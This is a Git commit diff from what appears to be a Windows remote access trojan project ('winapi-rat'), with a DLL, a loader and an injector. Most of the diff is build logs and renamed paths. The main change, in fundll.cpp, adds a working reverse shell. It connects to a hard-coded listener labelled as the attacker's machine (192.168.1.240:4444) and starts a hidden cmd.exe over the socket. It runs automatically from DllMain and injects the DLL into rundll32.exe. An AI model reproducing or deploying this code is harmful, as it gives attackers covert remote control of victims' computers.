Improved some stuff, cleaned some stuff. Now after executing loader the dll creates a reverse shell to a specified server.
This commit is contained in:
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,13 +0,0 @@
|
|||||||
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
|
|
||||||
c:\users\hellisabove\source\repos\rat\debug\dll.lib
|
|
||||||
c:\users\hellisabove\source\repos\rat\debug\dll.exp
|
|
||||||
c:\users\hellisabove\source\repos\rat\debug\dll.dll
|
|
||||||
c:\users\hellisabove\source\repos\rat\debug\dll.pdb
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.command.1.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.read.1.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\cl.write.1.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\dll.write.1u.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.command.1.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.read.1.tlog
|
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\dll.tlog\link.write.1.tlog
|
|
||||||
+4
-5
@@ -1,10 +1,9 @@
|
|||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Microsoft.CppBuild.targets(391,5): warning MSB8028: The intermediate directory (Debug\) contains files shared from another project (Dll.vcxproj). This can lead to incorrect clean and rebuild behavior.
|
|
||||||
fundll.cpp
|
fundll.cpp
|
||||||
tools.cpp
|
Creating library C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.exp
|
||||||
Creating library C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.lib and object C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.exp
|
|
||||||
Generating code
|
Generating code
|
||||||
c:\users\hellisabove\source\repos\rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
|
c:\users\hellisabove\source\repos\winapi-rat\dll\tools.cpp(162): warning C4715: 'Tools::AutoInject': not all control paths return a value
|
||||||
|
c:\users\hellisabove\source\repos\winapi-rat\dll\fundll.cpp(44): warning C4700: uninitialized local variable 'dll_param' used
|
||||||
All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
||||||
Finished generating code
|
Finished generating code
|
||||||
Dll.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\FunDLL.dll
|
Dll.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\FunDLL.dll
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +0,0 @@
|
|||||||
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
|
||||||
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
|
|
||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,16 +1,16 @@
|
|||||||
c:\users\hellisabove\source\repos\rat\dll\debug\vc141.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\vc141.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\tools.obj
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\tools.obj
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.obj
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.obj
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.lib
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.lib
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.exp
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.exp
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.ipdb
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.ipdb
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.iobj
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.iobj
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.dll
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.dll
|
||||||
c:\users\hellisabove\source\repos\rat\debug\fundll.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\debug\fundll.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\cl.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\cl.write.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\fundll.write.1u.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\dll\debug\fundll.tlog\link.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\dll\debug\fundll.tlog\link.write.1.tlog
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
|
|||||||
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
||||||
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
|
Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+42
-25
@@ -1,42 +1,59 @@
|
|||||||
|
#include <winsock2.h>
|
||||||
|
#include <stdio.h>
|
||||||
#include "tools.h"
|
#include "tools.h"
|
||||||
BOOL was_dllmain_called = FALSE;
|
#pragma comment(lib, "ws2_32")
|
||||||
DWORD dll_param;
|
|
||||||
|
|
||||||
LPSTR target_path = "C:\\Windows\\System32\\conhost.exe";
|
int reverse(void) {
|
||||||
|
WSADATA wsaData;
|
||||||
|
SOCKET wSock;
|
||||||
|
struct sockaddr_in sock;
|
||||||
|
STARTUPINFO si;
|
||||||
|
PROCESS_INFORMATION pi;
|
||||||
|
|
||||||
|
// listener ip, port on attacker's machine
|
||||||
|
char* ip = "192.168.1.240";
|
||||||
|
short port = 4444;
|
||||||
|
|
||||||
|
// init socket lib
|
||||||
|
WSAStartup(MAKEWORD(2, 2), &wsaData);
|
||||||
|
|
||||||
|
// create socket
|
||||||
|
wSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
|
||||||
|
|
||||||
|
sock.sin_family = AF_INET;
|
||||||
|
sock.sin_port = htons(port);
|
||||||
|
sock.sin_addr.s_addr = inet_addr(ip);
|
||||||
|
|
||||||
|
// connect to remote host
|
||||||
|
WSAConnect(wSock, (SOCKADDR*)&sock, sizeof(sock), NULL, NULL, NULL, NULL);
|
||||||
|
|
||||||
|
memset(&si, 0, sizeof(si));
|
||||||
|
si.cb = sizeof(si);
|
||||||
|
si.dwFlags = STARTF_USESTDHANDLES;
|
||||||
|
si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)wSock;
|
||||||
|
|
||||||
|
// start cmd.exe with redirected streams
|
||||||
|
CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
|
||||||
|
exit(0);
|
||||||
|
}
|
||||||
|
|
||||||
extern "C" __declspec(dllexport) void FunEntry() {
|
extern "C" __declspec(dllexport) void FunEntry() {
|
||||||
|
LPSTR target_path = "C:\\Windows\\System32\\rundll32.exe";
|
||||||
|
DWORD dll_param;
|
||||||
char dll_path[MAX_PATH];
|
char dll_path[MAX_PATH];
|
||||||
DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
|
DWORD ret = GetModuleFileNameA((HINSTANCE)dll_param, dll_path, MAX_PATH);
|
||||||
char test[1024];
|
reverse();
|
||||||
wsprintfA(test, "%s", dll_path);
|
|
||||||
MessageBoxA(0, test, "", 0);
|
|
||||||
// inject dll
|
|
||||||
Tools::AutoInject(target_path, dll_path);
|
Tools::AutoInject(target_path, dll_path);
|
||||||
}
|
}
|
||||||
|
|
||||||
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
|
BOOL APIENTRY DllMain(HMODULE Base, DWORD Callback, LPVOID Param) {
|
||||||
dll_param = (DWORD)Base;
|
|
||||||
was_dllmain_called = TRUE;
|
|
||||||
|
|
||||||
switch (Callback) {
|
switch (Callback) {
|
||||||
case DLL_PROCESS_ATTACH:
|
case DLL_PROCESS_ATTACH:
|
||||||
|
FunEntry();
|
||||||
break;
|
case DLL_THREAD_ATTACH:
|
||||||
|
case DLL_THREAD_DETACH:
|
||||||
case DLL_PROCESS_DETACH:
|
case DLL_PROCESS_DETACH:
|
||||||
|
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
return TRUE;
|
return TRUE;
|
||||||
}
|
|
||||||
|
|
||||||
extern "C" __declspec(dllexport) void MainBitch() {
|
|
||||||
if (was_dllmain_called) {
|
|
||||||
while (TRUE) {
|
|
||||||
char exe[MAX_PATH + 1];
|
|
||||||
GetModuleFileNameA(0, exe, sizeof(exe));
|
|
||||||
MessageBoxA(0, exe, "I am inside: ", 0);
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
MessageBoxA(NULL, "DLLMain was not called", NULL, 0);
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
@@ -1,5 +1,4 @@
|
|||||||
#include <Windows.h>
|
#include <Windows.h>
|
||||||
|
|
||||||
#pragma once
|
#pragma once
|
||||||
|
|
||||||
namespace Tools {
|
namespace Tools {
|
||||||
|
|||||||
@@ -1,13 +1,13 @@
|
|||||||
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\vc143.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\vc143.idb
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\vc143.idb
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.obj
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.obj
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.ilk
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.ilk
|
||||||
c:\users\hellisabove\source\repos\rat\debug\injector.exe
|
c:\users\hellisabove\source\repos\winapi-rat\debug\injector.exe
|
||||||
c:\users\hellisabove\source\repos\rat\debug\injector.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\debug\injector.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.items.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.items.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\cl.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\cl.write.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\injector\debug\injector.tlog\link.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\injector\debug\injector.tlog\link.write.1.tlog
|
||||||
|
|||||||
@@ -2,7 +2,7 @@
|
|||||||
<Project>
|
<Project>
|
||||||
<ProjectOutputs>
|
<ProjectOutputs>
|
||||||
<ProjectOutput>
|
<ProjectOutput>
|
||||||
<FullPath>C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe</FullPath>
|
<FullPath>C:\Users\hellisabove\source\repos\winapi-rat\Debug\Injector.exe</FullPath>
|
||||||
</ProjectOutput>
|
</ProjectOutput>
|
||||||
</ProjectOutputs>
|
</ProjectOutputs>
|
||||||
<ContentFiles />
|
<ContentFiles />
|
||||||
|
|||||||
Binary file not shown.
@@ -1,2 +1,2 @@
|
|||||||
injector.cpp
|
injector.cpp
|
||||||
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Injector.exe
|
Injector.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\Injector.exe
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1 +1 @@
|
|||||||
C:\Users\hellisabove\source\repos\RAT\Injector\injector.cpp;C:\Users\hellisabove\source\repos\RAT\Injector\Debug\injector.obj
|
C:\Users\hellisabove\source\repos\winapi-rat\Injector\injector.cpp;C:\Users\hellisabove\source\repos\winapi-rat\Injector\Debug\injector.obj
|
||||||
|
|||||||
@@ -1,2 +1,2 @@
|
|||||||
PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0:
|
PlatformToolSet=v143:VCToolArchitecture=Native32Bit:VCToolsVersion=14.36.32532:TargetPlatformVersion=10.0.22621.0:
|
||||||
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
|
Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -78,5 +78,5 @@ INT main(INT arg, PCHAR argv[]) {
|
|||||||
CloseHandle(x_file);
|
CloseHandle(x_file);
|
||||||
}
|
}
|
||||||
else
|
else
|
||||||
printf("\nUSE: %s section name target dll\n",argv[0]);
|
printf("\nUSE: %s 'section name' target dll\n",argv[0]);
|
||||||
}
|
}
|
||||||
@@ -1,11 +1,11 @@
|
|||||||
c:\users\hellisabove\source\repos\rat\loader\debug\vc141.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\vc141.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\tools.obj
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\tools.obj
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.obj
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.obj
|
||||||
c:\users\hellisabove\source\repos\rat\debug\loader.exe
|
c:\users\hellisabove\source\repos\winapi-rat\debug\loader.exe
|
||||||
c:\users\hellisabove\source\repos\rat\debug\loader.pdb
|
c:\users\hellisabove\source\repos\winapi-rat\debug\loader.pdb
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\cl.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\cl.write.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.command.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.command.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.read.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.read.1.tlog
|
||||||
c:\users\hellisabove\source\repos\rat\loader\debug\loader.tlog\link.write.1.tlog
|
c:\users\hellisabove\source\repos\winapi-rat\loader\debug\loader.tlog\link.write.1.tlog
|
||||||
|
|||||||
@@ -1,6 +1,2 @@
|
|||||||
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
|
||||||
cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
|
Loader.vcxproj -> C:\Users\hellisabove\source\repos\winapi-rat\Debug\Loader.exe
|
||||||
loader.cpp
|
|
||||||
tools.cpp
|
|
||||||
Generating Code...
|
|
||||||
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
|
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -1,2 +1,2 @@
|
|||||||
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
#TargetFrameworkVersion=:PlatformToolSet=v141_xp:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=7.0
|
||||||
Debug|Win32|C:\Users\hellisabove\source\repos\RAT\|
|
Debug|Win32|C:\Users\hellisabove\source\repos\winapi-rat\|
|
||||||
|
|||||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Reference in New Issue
Block a user